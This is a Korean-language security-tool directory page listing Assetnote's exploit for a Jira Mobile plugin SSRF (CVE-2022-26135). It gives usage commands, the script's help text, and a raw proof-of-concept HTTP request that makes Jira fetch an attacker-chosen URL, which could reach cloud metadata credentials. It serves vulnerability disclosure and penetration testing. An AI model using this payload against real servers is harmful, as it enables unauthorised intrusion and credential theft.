Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
jira-mobile-ssrf-exploit — Jira Mobile Rest Plugin SSRF (CVE-2022-26135) 취약점 익스플로잇 코드 | Kitploit
도구/GitHubGitHub/assetnote/jira-mobile-ssrf-exploit
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubassetnote/jira-mobile-ssrf-exploit

jira-mobile-ssrf-exploit

Jira Mobile Rest Plugin SSRF (CVE-2022-26135) 취약점 익스플로잇 코드

저장소 보기
8515494년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-26135 - Jira 데이터 센터 및 서버용 모바일 플러그인의 전체 읽기 서버측 요청 위조

Assetnote 소개

Assetnote는 외부 자산을 자동으로 매핑하고 변경 사항과 보안 문제를 모니터링하여 심각한 침해를 방지하는 데 도움을 줍니다.

이 연구는 Assetnote의 보안 연구팀에 의해 수행되었습니다.

제품과 팀에 대한 자세한 내용은 https://assetnote.io에서 확인할 수 있습니다.

블로그 게시물

이 취약점 발견을 위해 수행된 단계를 상세히 설명하는 블로그 게시물은 여기에서 찾을 수 있습니다.

설명

Jira Core 및 Jira Service Desk는 인증 후 서버측 요청 위조에 취약합니다. 일부 경우에는 Jira Core 또는 Jira Service Desk의 공개 등록을 이용하여 알려진 자격 증명 없이 이 서버측 요청 위조 결함을 악용할 수 있습니다.

영향

SSRF 취약점으로 인해 공격자는 모든 HTTP 메서드, 헤더 및 본문을 사용하여 임의의 URL로 HTTP 요청을 보낼 수 있습니다. Jira가 클라우드 환경에 배포된 경우, 공격자는 이 익스플로잇 체인을 활용하여 메타데이터 IP 주소를 통해 클라우드 자격 증명 또는 기타 민감한 정보를 얻을 수 있습니다.

영향을 받는 소프트웨어

Atlassian의 권고에 따라, 영향을 받는 소프트웨어 버전을 실행 중인지 확인하려면 다음 기술 자료 문서를 참조하십시오: https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html

사용 지침

root@kitploit:~
pip3 install -r requirements.txt

그런 다음 익스플로잇을 사용할 수 있습니다:

root@kitploit:~
python3 exploit.py

도움말:

root@kitploit:~
usage: exploit.py [-h] --target TARGET --ssrf SSRF --mode MODE [--software SOFTWARE] [--username USERNAME] [--email EMAIL] [--password PASSWORD]

optional arguments:
  -h, --help           show this help message and exit
  --target TARGET      i.e. http://re.local:8090
  --ssrf SSRF          i.e. example.com (no protocol pls)
  --mode MODE          i.e. manual or automatic - manual mode you need to provide user auth info
  --software SOFTWARE  i.e. jira or jsd - only needed for manual mode
  --username USERNAME  i.e. admin - only needed for manual jira mode
  --email EMAIL        i.e. [email protected] - only needed for manual jira service desk mode
  --password PASSWORD  i.e. testing123 - only needed for manual mode

이미 Jira / Jira Service Desk에 대한 자격 증명이 있는 경우, --mode를 manual로 설정하고 --software 인수를 jira 또는 jsd로 설정하십시오.

HTTP 요청

다음 HTTP 요청을 사용하여 Jira 인스턴스에 인증된 후 이 문제를 재현할 수 있습니다:

root@kitploit:~
POST /rest/nativemobile/1.0/batch HTTP/2
Host: issues.example.com
Cookie: JSESSIONID=44C6A24A15A1128CE78586A0FA1B1662; seraph.rememberme.cookie=818752%3Acc12c66e2f048b9d50eff8548800262587b3e9b1; atlassian.xsrf.token=AES2-GIY1-7JLS-HNZJ_db57d0893ec4d2e2f81c51c1a8984bde993b7445_lin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Origin: https://issues.example.com
Referer: https://issues.example.com/plugins/servlet/desk
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 63

{"requests":[{"method":"GET","location":"@example.com"}]}
도구 다운로드